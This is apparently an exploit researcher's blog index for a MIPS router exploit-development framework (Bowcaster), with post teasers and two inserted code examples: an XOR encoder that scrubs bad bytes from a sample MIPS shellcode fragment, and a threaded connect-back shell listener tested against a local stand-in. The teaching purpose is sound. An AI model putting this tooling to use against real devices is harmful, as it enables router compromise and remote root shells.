Posts
UPDATE: Turns out, Jacob Holcomb (@rootHak42 on Twitter) of Independent Security Evaluators found this bug back in April on a different device, the WNDR4700. Thanks for letting me know, Jacob. Nice find. Here’s a link to that report.
UPDATE 2: Because there are almost certainly fools who would go hack somebody’s router and say I told them to do it, I added a warning to not do this. DON’T DO IT.
Read more
I’ve just added a module to Bowcaster that I think is cool. Actually, I just got around to finishing a module that was there all along. It’s a basic HTTP server module, but it has some unique features that make it suitable for serving payloads to remotely exploited targets.
The connect-back server modules in Bowcaster are designed to run asynchronously so that they can be used right in line with your exploit code. Basically the model is this:
Read more
Update December 2014: 44CON has posted the videos from all 2013 talks online. Unfortunately, they don’t allow the videos to be embedded, so here’s a link.
For my presentation at 44CON, entitled “Reversing and Exploiting BT CPE Devices”, rather than have one or two or three slides packed with hard to read URLs, I included a single slide with a link to this post. Here you’ll find links to additional resources that I may have referenced in my talk.
Read more
Note: I have a great job at a company called Tactical Network Solutions, based in Columbia, MD. I’m not looking for a new job. That’s not why I’m writing this post. I have way too much fun working with crazy smart people right where I am.
I get a lot of recruiter email. Some are very thoughtful and are for companies that would be very cool to work for. I love those, and I want to high five those people for being such class acts. I try to always send them a thoughtful response thanking them for thinking of me, but letting them know I’m fine where I am.
Read more
Sometimes I need a MIPS Linux system that I can use for development and testing. Maybe I need to test some shellcode or debug a binary I’m analyzing. What I wish existed was a Raspberry Pi-like MIPS device. I’d love to have a bunch of small, sub-$50 devices that I could network together as a sort of desktop exploit lab. Unfortunately I don’t know of such a device. There is MIPS hardware you can get and install Linux on. I have a Cobalt RaQ, and a lot of people like to get a hackable WiFi router and image it with OpenWrt. But there’s nothing as small, cheap and convenient as the RPi that is MIPS.
Read more
Nothing original here, but this is a great tip, so I want to share it. Thanks to @thegrugq for cluing me into this via Twitter.
For everyone running OS X 10.7 or 10.8 on their Macs (and really, EVERYONE should be on 10.8; the security benefits are non-trivial) and using FileVault 2 to encrypt your filesystems (you are, right?), here’s a good tip I picked up the other day:
Read more
In previous parts of the Bowcaster tutorial, I showed how to construct your buffer overflow using the OverflowBuffer class. I also mentioned there is another class, EmptyOverflowBuffer, that I would explain later. That class is going to be the topic of this post.
When I started development of Bowcaster, I created it for myself and for the way I develop exploits and think about buffer overflows. The OverflowBuffer class works the way I think. But when I talked to my colleague, Craig Heffner, about the project, he preferred a different API, and I realized that we each think about the same problem in different ways.
Read more
In part 1 of the Bowcaster tutorial I showed how to generate an overflow string with the OverflowBuffer class. In part 2, I showed how to populate your overflow string with ROP gadgets. In part 3, I showed how to add Bowcaster’s connect-back payload for MIPS Linux to your overflow string. I also showed how to encode your payload using Bowcaster’s MIPS Linux-specific XOR encoder in order to sanitize restricted bytes.
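The "sanitize restricted bytes" step deserves a concrete illustration. The following is an added example written for this page, not Bowcaster's own encoder: it shows only the key-selection and encoding half of an XOR encoder for a word-oriented (4-byte, big-endian MIPS) payload. The point it demonstrates is that, because XOR works byte-for-byte, each byte position of the 4-byte key can be chosen independently: for position i you only need a key byte that is itself not restricted (the decoder stub has to load it as an immediate) and that maps every payload byte found at position i to a non-restricted value. The sample payload (the opening instructions of a MIPS socket() call) and the restricted-byte set (NUL, CR, LF, space, the usual suspects for a string-handling overflow) are constructed for the example; the MIPS decoder stub that would be prepended in a real exploit is out of scope here.

```python
# Added example: XOR-encode a word-aligned MIPS payload so that neither the
# encoded bytes nor the key contain restricted ("bad") bytes. Not Bowcaster code.

# Constructed sample: first words of a MIPS Linux socket() sequence, big-endian.
SAMPLE_PAYLOAD = bytes.fromhex(
    "240ffffa"   # addiu $t7,$zero,-6
    "01e07827"   # nor   $t7,$t7,$zero      -> $t7 = 5
    "21e40002"   # addi  $a0,$t7,2          -> AF_INET
    "21e50002"   # addi  $a1,$t7,2          -> SOCK_STREAM
    "2806ffff"   # slti  $a2,$zero,-1       -> 0 (protocol)
    "24021057"   # addiu $v0,$zero,4183     -> SYS_socket (o32)
    "0101010c"   # syscall 0x40404
)

# Constructed restricted set: NUL, LF, CR, space.
BAD_BYTES = b"\x00\x0a\x0d\x20"


def find_xor_key(payload: bytes, bad_bytes: bytes, word_size: int = 4) -> bytes:
    """Pick one key byte per position within the word.

    Byte i of every word is XORed with key[i], so the search is per column:
    a key byte is acceptable if it is not itself restricted and XORing it
    with every payload byte in that column yields a non-restricted byte.
    """
    bad = set(bad_bytes)
    key = bytearray()
    for pos in range(word_size):
        column = set(payload[pos::word_size])
        for candidate in range(256):
            if candidate in bad:
                continue  # the decoder stub must be able to load the key as an immediate
            if all((b ^ candidate) not in bad for b in column):
                key.append(candidate)
                break
        else:
            raise ValueError(f"no usable key byte for word position {pos}")
    return bytes(key)


def xor_encode(payload: bytes, bad_bytes: bytes, word_size: int = 4):
    """Return (key, encoded). The payload must be whole words, as MIPS code is."""
    if len(payload) % word_size:
        raise ValueError("payload length must be a multiple of the word size")
    key = find_xor_key(payload, bad_bytes, word_size)
    encoded = bytes(b ^ key[i % word_size] for i, b in enumerate(payload))
    return key, encoded


def xor_decode(encoded: bytes, key: bytes) -> bytes:
    """What the decoder stub does on the target: XOR each word with the key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(encoded))


def contains_bad_bytes(data: bytes, bad_bytes: bytes) -> bool:
    return any(b in data for b in bad_bytes)


if __name__ == "__main__":
    key, enc = xor_encode(SAMPLE_PAYLOAD, BAD_BYTES)
    print("key     :", key.hex())
    print("encoded :", enc.hex())
    print("clean   :", not contains_bad_bytes(enc + key, BAD_BYTES))
    print("roundtrip ok:", xor_decode(enc, key) == SAMPLE_PAYLOAD)
```

Running it against the sample payload selects the key `02 03 02 03`: the raw payload contains several NUL bytes (in the `addi` immediates), the encoded form contains none of the four restricted values, and decoding with the same key gives the original bytes back. A real encoder also has to make sure the decoder stub itself is free of restricted bytes; that part is left to the stub's author.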
Part 3 ended by using a netcat listener to serve a connect-back root shell. In this part I’ll show how to use one of Bowcaster’s server modules to replace netcat.
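The reason a server module is preferable to a separate netcat window (and the asynchronous model mentioned in the Bowcaster HTTP server post above) can be shown in a few lines. What follows is an added example, not Bowcaster's server module or its API: a connect-back listener that runs in a background thread so the exploit script can start it, send the exploit in line, and then block until the shell has called back. The target side is a constructed stand-in that simply connects to the listener and answers the first command; on an actual engagement that connection would come from the connect-back payload on the device. Host, port selection (port 0, so the OS picks a free one) and the `id` probe are choices made for this example.

```python
# Added example: an in-line, asynchronous connect-back listener. Not Bowcaster code.
import socket
import threading


class ConnectBackListener:
    """Background TCP listener: call start() before sending the exploit, wait() after."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0, timeout: float = 5.0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.sock.settimeout(timeout)       # don't hang forever if the exploit fails
        self.port = self.sock.getsockname()[1]
        self.peer = None
        self.first_line = None              # reply to the first command, once received
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self) -> "ConnectBackListener":
        self._thread.start()
        return self

    def _serve(self) -> None:
        try:
            conn, self.peer = self.sock.accept()
        except socket.timeout:
            return                          # no callback: leave first_line as None
        finally:
            self.sock.close()               # one callback is all we want
        with conn:
            conn.sendall(b"id\n")           # probe the shell as soon as it connects
            buf = b""
            while b"\n" not in buf:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
            self.first_line = buf.split(b"\n", 1)[0].decode(errors="replace")

    def wait(self):
        """Block until the callback has been handled (or timed out); return the probe reply."""
        self._thread.join()
        return self.first_line


def fake_target(port: int) -> None:
    """Constructed stand-in for the exploited device's connect-back shell."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        cmd = b""
        while b"\n" not in cmd:
            chunk = s.recv(64)
            if not chunk:
                return
            cmd += chunk
        if cmd.strip() == b"id":
            s.sendall(b"uid=0(root) gid=0(root)\n")


def run_exploit_flow() -> str:
    """The ordering the asynchronous model buys you, in one function."""
    listener = ConnectBackListener().start()   # 1. listener is up before the exploit goes out
    fake_target(listener.port)                 # 2. send the exploit (stand-in connects back here)
    return listener.wait()                     # 3. block until the shell answers


if __name__ == "__main__":
    print(run_exploit_flow())
```

The ordering in `run_exploit_flow` is the whole point: the listening socket exists before the exploit is sent, so a fast callback can't be lost, and the script only blocks once it has nothing left to do but wait for the shell. A timeout on `accept` turns a failed exploit into a `None` result instead of a hung terminal.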
Read more
Crossbow has been renamed to Bowcaster. It turns out “Crossbow” is a popular word. Who knew? A company in California has the word registered as a trademark in the US in connection with computer software. They might be cool with us using the word, since this is an open-source, noncommercial product, but we’ve decided to change the name just in case. Hopefully the new name is esoteric enough to avoid any naming conflicts, while still being cool and fun to say. I left the original post as-is, save for an update note and a new GitHub link. The old GitHub project will stay up for a while, but you should use the new one from this point on.
Read more
This is the third part in a multi-part tutorial on using the Bowcaster exploit development framework to build a buffer overflow exploit. Here are part 1 and part 2.
In the last part, we had built an exploit buffer and added a ROP chain that would flush the MIPS CPU cache, locate the stack (which is randomized), and return into it. Now it’s time to add a payload.
Bowcaster provides a few MIPS Linux payloads, and the one we’ll use for this buffer overflow is the connect-back payload, which will yield an interactive shell.
Read more